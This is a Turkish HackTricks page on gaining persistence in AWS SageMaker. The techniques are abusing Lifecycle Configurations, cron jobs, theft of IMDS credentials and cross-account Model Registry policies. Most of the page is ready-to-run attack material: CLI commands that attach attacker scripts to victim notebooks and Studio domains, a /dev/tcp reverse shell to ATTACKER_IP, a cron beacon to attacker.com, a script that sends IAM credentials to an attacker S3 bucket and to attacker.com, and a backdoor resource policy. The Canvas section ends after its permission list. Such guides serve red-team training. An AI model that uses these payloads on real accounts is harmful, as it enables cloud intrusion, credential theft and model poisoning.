AWS - SageMaker Persistence

Tip

AWS Hacking’i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking’i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)
Az Hacking’i öğrenin ve pratik yapın: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks'i Destekleyin

Kalıcılık Tekniklerine Genel Bakış

Bu bölüm, Lifecycle Configurations (LCCs) kötüye kullanılarak SageMaker’da persistence elde etmeye yönelik yöntemleri özetler; reverse shells, cron jobs, credential theft via IMDS ve SSH backdoors dahil. Bu scriptler instance’ın IAM role ile çalışır ve yeniden başlatmalarda kalıcı olabilir. Çoğu teknik outbound ağ erişimi gerektirir, ancak ortam ‘VPC-only’ modunda olsa bile AWS control plane üzerindeki servislerin kullanımıyla başarı yine de mümkün olabilir.

Tip

Not: SageMaker notebook instances temelde makine öğrenimi iş yükleri için özel olarak yapılandırılmış yönetilen EC2 instance’larıdır.

Gerekli İzinler

  • Notebook Instances:
sagemaker:CreateNotebookInstanceLifecycleConfig
sagemaker:UpdateNotebookInstanceLifecycleConfig
sagemaker:CreateNotebookInstance
sagemaker:UpdateNotebookInstance
  • Studio Uygulamaları:
sagemaker:CreateStudioLifecycleConfig
sagemaker:UpdateStudioLifecycleConfig
sagemaker:UpdateUserProfile
sagemaker:UpdateSpace
sagemaker:UpdateDomain

Notebook Instances üzerinde Lifecycle Configuration ayarlama

Örnek AWS CLI Komutları:

# Create Lifecycle Configuration*

aws sagemaker create-notebook-instance-lifecycle-config \
--notebook-instance-lifecycle-config-name attacker-lcc \
--on-start Content=$(base64 -w0 reverse_shell.sh)


# Attach Lifecycle Configuration to Notebook Instance*

aws sagemaker update-notebook-instance \
--notebook-instance-name victim-instance \
--lifecycle-config-name attacker-lcc

SageMaker Studio’da Lifecycle Configuration Ayarlama

Lifecycle Configurations, SageMaker Studio içinde çeşitli seviyelere ve farklı uygulama türlerine eklenebilir.

Studio Domain Seviyesi (Tüm Kullanıcılar)

# Create Studio Lifecycle Configuration*

aws sagemaker create-studio-lifecycle-config \
--studio-lifecycle-config-name attacker-studio-lcc \
--studio-lifecycle-config-app-type JupyterServer \
--studio-lifecycle-config-content $(base64 -w0 reverse_shell.sh)


# Apply LCC to entire Studio Domain*

aws sagemaker update-domain --domain-id <DOMAIN_ID> --default-user-settings '{
"JupyterServerAppSettings": {
"DefaultResourceSpec": {"LifecycleConfigArn": "<LCC_ARN>"}
}
}'

Studio Space Seviyesi (Bireysel veya Paylaşılan Alanlar)

# Update SageMaker Studio Space to attach LCC*

aws sagemaker update-space --domain-id <DOMAIN_ID> --space-name <SPACE_NAME> --space-settings '{
"JupyterServerAppSettings": {
"DefaultResourceSpec": {"LifecycleConfigArn": "<LCC_ARN>"}
}
}'

Studio Uygulama Yaşam Döngüsü Yapılandırma Türleri

Yaşam döngüsü yapılandırmaları, farklı SageMaker Studio uygulama türlerine özel olarak uygulanabilir:

  • JupyterServer: Jupyter server başlatılırken scripts çalıştırır, reverse shells ve cron jobs gibi persistence mekanizmaları için idealdir.
  • KernelGateway: kernel gateway uygulama başlatılırken çalışır, ilk kurulum veya persistent erişim için kullanışlıdır.
  • CodeEditor: Code Editor (Code-OSS) için uygulanır, code editing sessions başlatıldığında çalışan scripts etkinleştirir.

Her Tür İçin Örnek Komut:

JupyterServer

aws sagemaker create-studio-lifecycle-config \
--studio-lifecycle-config-name attacker-jupyter-lcc \
--studio-lifecycle-config-app-type JupyterServer \
--studio-lifecycle-config-content $(base64 -w0 reverse_shell.sh)

KernelGateway

aws sagemaker create-studio-lifecycle-config \
--studio-lifecycle-config-name attacker-kernelgateway-lcc \
--studio-lifecycle-config-app-type KernelGateway \
--studio-lifecycle-config-content $(base64 -w0 kernel_persist.sh)

Kod Editörü

aws sagemaker create-studio-lifecycle-config \
--studio-lifecycle-config-name attacker-codeeditor-lcc \
--studio-lifecycle-config-app-type CodeEditor \
--studio-lifecycle-config-content $(base64 -w0 editor_persist.sh)

Kritik Bilgi:

  • LCCs’i domain veya space düzeyinde eklemek, kapsam içindeki tüm kullanıcıları veya uygulamaları etkiler.
  • Daha yüksek izinler gerektirir (sagemaker:UpdateDomain, sagemaker:UpdateSpace); genellikle space düzeyinde uygulanması domain düzeyine göre daha kolaydır.
  • Ağ düzeyindeki kontroller (ör. sıkı egress filtering), başarılı reverse shell’leri veya data exfiltration’ı engelleyebilir.

Reverse Shell via Lifecycle Configuration

SageMaker Lifecycle Configurations (LCCs), notebook instances başlarken özel script’ler çalıştırır. İzinlere sahip bir saldırgan kalıcı bir reverse shell kurabilir.

Payload Example:

#!/bin/bash
ATTACKER_IP="<ATTACKER_IP>"
ATTACKER_PORT="<ATTACKER_PORT>"
nohup bash -i >& /dev/tcp/$ATTACKER_IP/$ATTACKER_PORT 0>&1 &

Lifecycle Configuration aracılığıyla Cron Job kalıcılığı

Bir saldırgan, LCC scripts aracılığıyla cron jobs enjekte ederek kötü amaçlı scriptlerin veya komutların periyodik olarak çalışmasını sağlayabilir ve böylece sinsi bir kalıcılık elde edebilir.

Payload Example:

#!/bin/bash
PAYLOAD_PATH="/home/ec2-user/SageMaker/.local_tasks/persist.py"
CRON_CMD="/usr/bin/python3 $PAYLOAD_PATH"
CRON_JOB="*/30 * * * * $CRON_CMD"

mkdir -p /home/ec2-user/SageMaker/.local_tasks
echo 'import os; os.system("curl -X POST http://attacker.com/beacon")' > $PAYLOAD_PATH
chmod +x $PAYLOAD_PATH

(crontab -u ec2-user -l 2>/dev/null | grep -Fq "$CRON_CMD") || (crontab -u ec2-user -l 2>/dev/null; echo "$CRON_JOB") | crontab -u ec2-user -

Credential Exfiltration via IMDS (v1 & v2)

Lifecycle configurations, Instance Metadata Service (IMDS)’i sorgulayarak IAM credentials alabilir ve bunları saldırgan kontrollü bir konuma exfiltrate edebilir.

Payload Example:

#!/bin/bash
ATTACKER_BUCKET="s3://attacker-controlled-bucket"
TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
ROLE_NAME=$(curl -s -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/)
curl -s -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/$ROLE_NAME > /tmp/creds.json

# Exfiltrate via S3*

aws s3 cp /tmp/creds.json $ATTACKER_BUCKET/$(hostname)-creds.json

# Alternatively, exfiltrate via HTTP POST*

curl -X POST -F "file=@/tmp/creds.json" http://attacker.com/upload

Model Registry kaynak politikası yoluyla kalıcılık (PutModelPackageGroupPolicy)

SageMaker Model Package Group üzerindeki kaynak tabanlı politikayı kötüye kullanarak harici bir principal’a cross-account hakları verin (ör. CreateModelPackage/Describe/List). Bu, saldırganın IAM user/role’u hedef hesapta kaldırılmış olsa bile zehirlenmiş model sürümlerini itmeye veya model metadata/artifaktlarını okumaya olanak tanıyan kalıcı bir arka kapı oluşturur.

Gerekli izinler

  • sagemaker:CreateModelPackageGroup
  • sagemaker:PutModelPackageGroupPolicy
  • sagemaker:GetModelPackageGroupPolicy

Adımlar (us-east-1)

# 1) Create a Model Package Group
REGION=${REGION:-us-east-1}
MPG=atk-mpg-$(date +%s)
aws sagemaker create-model-package-group \
--region "$REGION" \
--model-package-group-name "$MPG" \
--model-package-group-description "Test backdoor"

# 2) Craft a cross-account resource policy (replace 111122223333 with attacker account)
cat > /tmp/mpg-policy.json <<JSON
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "AllowCrossAccountCreateDescribeList",
"Effect": "Allow",
"Principal": {"AWS": ["arn:aws:iam::111122223333:root"]},
"Action": [
"sagemaker:CreateModelPackage",
"sagemaker:DescribeModelPackage",
"sagemaker:DescribeModelPackageGroup",
"sagemaker:ListModelPackages"
],
"Resource": [
"arn:aws:sagemaker:${REGION}:<VICTIM_ACCOUNT_ID>:model-package-group/${MPG}",
"arn:aws:sagemaker:${REGION}:<VICTIM_ACCOUNT_ID>:model-package/${MPG}/*"
]
}
]
}
JSON

# 3) Attach the policy to the group
aws sagemaker put-model-package-group-policy \
--region "$REGION" \
--model-package-group-name "$MPG" \
--resource-policy "$(jq -c . /tmp/mpg-policy.json)"

# 4) Retrieve the policy (evidence)
aws sagemaker get-model-package-group-policy \
--region "$REGION" \
--model-package-group-name "$MPG" \
--query ResourcePolicy --output text

Notes

  • Gerçek bir cross-account backdoor için, Resource’ı belirli group ARN ile sınırlandırın ve Principal içinde attacker’ın AWS hesap ID’sini kullanın.
  • Uçtan uca cross-account dağıtım veya artifact okuma durumlarında, S3/ECR/KMS izinlerini attacker account ile uyumlu hale getirin.

Impact

  • Bir Model Registry group üzerinde kalıcı cross-account kontrol: attacker, kötü amaçlı model sürümlerini yayınlayabilir veya model metadata’sını listeleyip/okuyabilir; bu, victim account’ta onların IAM varlıkları kaldırıldıktan sonra bile geçerlidir.

Canvas cross-account model registry backdoor (UpdateUserProfile.ModelRegisterSettings)

SageMaker Canvas kullanıcı ayarlarını kötüye kullanarak model registry yazımlarını sessizce attacker-controlled account’a yönlendirin: ModelRegisterSettings’i etkinleştirip CrossAccountModelRegisterRoleArn’i başka bir hesaptaki attacker role’a işaret edecek şekilde ayarlayın.

Required permissions

  • sagemaker:UpdateUserProfile on the target UserProfile
  • Optional: sagemaker:CreateUserProfile on a Domain you control

Tip

AWS Hacking’i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking’i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)
Az Hacking’i öğrenin ve pratik yapın: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks'i Destekleyin